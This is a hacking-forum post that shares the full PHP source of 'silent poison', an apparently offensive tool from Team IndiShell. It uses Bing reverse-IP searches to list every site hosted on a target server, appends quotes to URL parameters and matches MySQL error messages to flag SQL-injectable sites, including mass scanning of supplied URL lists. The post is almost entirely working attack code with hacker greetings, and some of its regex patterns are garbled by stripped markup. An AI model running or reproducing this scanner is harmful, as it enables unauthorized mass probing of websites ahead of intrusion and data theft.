Jump to content
YOUR-AD-HERE
HOSTING
TOOLS
992Proxy

Locked silent poison

sQuo

By ADMINsQuo
in PHP & HTML (Source)

 Share

Recommended Posts

sQuo Hacker

ADMINsQuo

Posted
Posted

silent poison is a PHP shell script,Loded with Some special fuctions for exploring SQL injections,This Script is Devloped by Manish Tanwar From Team Indishell, You can Find Other php Script by Manish HereMajor Fuctions of Silent Poison domain extractor on same server, bing based SQLI scanner, mass SQLI scanning[LENGUAJE=php]<?php$head = '

--==[[ silent poison Bing rever ip domain scanner By Team IndiShell]]==-- '; ?><?phpecho $head ;echo '################################################################################################################################################

-==[[Greetz to]]==--Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell

Reborn India,cool toad,cool shavik,Hackuin,Alicks,Ebin V Thomas,Dinelson Amine,Th3 D3str0yer,SKSking,Mr. Trojan,rad paul,Godzila,mike waals,zoo,cyber warrior,Neo hacker ICA

Suriya Prakash,cyber gladiator,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk,brown suger and rest of TEAM INDISHELL

--==[[Love to]]==--

# My Father , my Ex Teacher,cold fire hacker,Mannu, ViKi ,Soldier Of God, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand ,Budhaoo

--==[[interface Desgined By]]==--

GCE College ke DON :D

#################################################################################################################################################

--==[[ Silent Poison ]]==--

--==[[ Bing reverse ip domain lookup scanner By Team IndiShell ]]==--

love happen only once.....Rest is life......

--==[[ code for India,Hack for India,Die for India ]]==--

';?>

--==[[||>>++++||>>++++]]==--

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|||||

 <?php error_reporting(0); function entre2v2($text,$marqueurDebutLien,$marqueurFinLien){$ar0=explode($marqueurDebutLien, $text);$ar1=explode($marqueurFinLien, $ar0[1]);$ar=trim($ar1[0]);return $ar;} function getHost($Address){ $parseUrl = parse_url(trim($Address)); return trim($parseUrl[host] ? $parseUrl[host] : array_shift(explode('/', $parseUrl[path], 2)));}function sql($tu){$ch = curl_init();$url=str_replace("=","='",$tu)."

";curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_HEADER, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); $content=$result['EXE'] = curl_exec($ch);if(preg_match("/You have an error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$content)) { echo "

i got sql injection symtoms in website $tu
";} else { echo "

bhai ji check link manually for vulnerability existance :(

"; } } function e($i,$q,$p) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'http://www.bing.com/search?q=ip%3A' .$i . '+'.$q.'&go=&qs=n&first=' . $p.'0&FORM=PERE'); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_REFERER, 'http://www.bing.com/'); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8'); return $result['EXE'] = curl_exec($ch); curl_close($ch); } ?> <?phpif(isset($_POST['scan'])){?>

Target server ip/website:

||

\/

<?php}?><?php error_reporting(0);if(isset($_POST['billu'])){$iw=$_POST['serverip'];$rr=ereg_replace("(https?)://", "", $iw);$web= ereg_replace("www.", "", $rr);echo "server ip is ".gethostbyname($web)."";$server=gethostbyname($web);echo "

###############################################

";echo "list of hosted website is given below......

";$var=0;$alllinks=array();do{ $pgs=$var; $link="http://www.bing.com/search?q=ip%3A" .$server . "&go=&qs=n&first=" . $pgs."0&FORM=PERE"; $uurl=file_get_contents($link);if($uurl && preg_match('/\">Next/i',$uurl)){//echo "next page link exist";$r=1;$pdata=e($server,$qu,$pgs); if(preg_match_all('(

.*

.*(.*).*

.*
)siU', $pdata,$i, PREG_SET_ORDER)) { foreach($i as $match) { $total=$match[0]."\n" ; $domain=entre2v2($total,"a href=\"","\" h=\"ID="); $URL=gethost($domain); $li=ereg_replace("www.", "", $URL); //echo $li."\n"; array_push($alllinks,$li); } }}else{$r=0;}$var++;}while($r!='0');$lastarray=array_unique($alllinks);echo "
";echo "";echo "

";}?><?phpif(isset($_POST['msqli'])){$a=explode("\n",$_POST['a']);foreach($a as $sa){echo $URL=trim($sa); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$URL ); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_REFERER, 'http://www.google.com/'); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8'); $result['EXE'] = curl_exec($ch); $result['ERR'] = curl_error($ch); curl_close($ch); if ( empty( $result['ERR'] ) ) { if(preg_match_all('/

"; echo $domain=getHost($URL)."/".$text1; if(preg_match("/=/i",$domain)) { sql($domain); }else {echo "

link dont have dynamic parameter

";} }}}}}?><?phpif(isset($_POST['hosted'])){?>

website/ip

||

\/

<?php}?><?phpset_time_limit(0); error_reporting(0); if(isset($_POST['s'])){$iw=$_POST['ip'];$rr=ereg_replace("(https?)://", "", $iw);$web= ereg_replace("www.", "", $rr);echo "server ip is ".gethostbyname($web)."";$server=gethostbyname($web);echo "

###############################################

";echo "list of hosted website is given below......

";$var=0;do{ $pgs=$var; $link="http://www.bing.com/search?q=ip%3A" .$server . "&go=&qs=n&first=" . $pgs."0&FORM=PERE"; $uurl=file_get_contents($link);if($uurl && preg_match('/\">Next/i',$uurl)){//echo "next page link exist";$r=1;$pdata=e($server,$qu,$pgs); if(preg_match_all('(

.*

.*(.*).*

.*
)siU', $pdata,$i, PREG_SET_ORDER)) { foreach($i as $match) { $total=$match[0]."\n" ; $domain=entre2v2($total,"a href=\"","\" h=\"ID="); $URL=gethost($domain); echo "

".$URL.""; }}}else{$r=0;}$var++;}while($r!='0');}?><?php if(isset($_POST['sql'])) { ?>

Target server ip/website: &nbsp

query bhai ji =)) ==>

<?php}?><?phperror_reporting(0);set_time_limit(0);if(isset($_POST['ssm'])){$wi=$_POST['ip'];$rr=ereg_replace("(https?)://", "",$wi);$server= ereg_replace("www.", "", $rr);echo "server under scaning ==> ". $sr=gethostbyname($server);echo "&nbsp &nbspquery ==> ".$qu=trim($_POST['query']);echo "

=====================================================================

";$var=0;do{$pgs=$var; $link="http://www.bing.com/search?q=ip%3A".$sr . "+".$qu."&go=&qs=n&first=" . $pgs."0&FORM=PERE";$uurl=file_get_contents($link);if($uurl && preg_match('/\">Next/i',$uurl)){//echo "next page link exist";$r=1;$pdata=e($sr,$qu,$pgs);if(preg_match_all('(

.*

.*(.*).*

.*
)siU', $pdata,$i, PREG_SET_ORDER)) { foreach($i as $match) { $total=$match[0]."\n" ; $domain=entre2v2($total,"a href=\"","\" h=\"ID="); echo "

testing link ".$domain; if(preg_match("/=/i",$domain)) { sql($domain); }else {echo "

link dont have dynamic parameter

";}}}}else{$r=0;}$var++;}while($r!='0');}?>[/LENGUAJE]

Link to comment
Share on other sites
Guest
This topic is now closed to further replies.
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.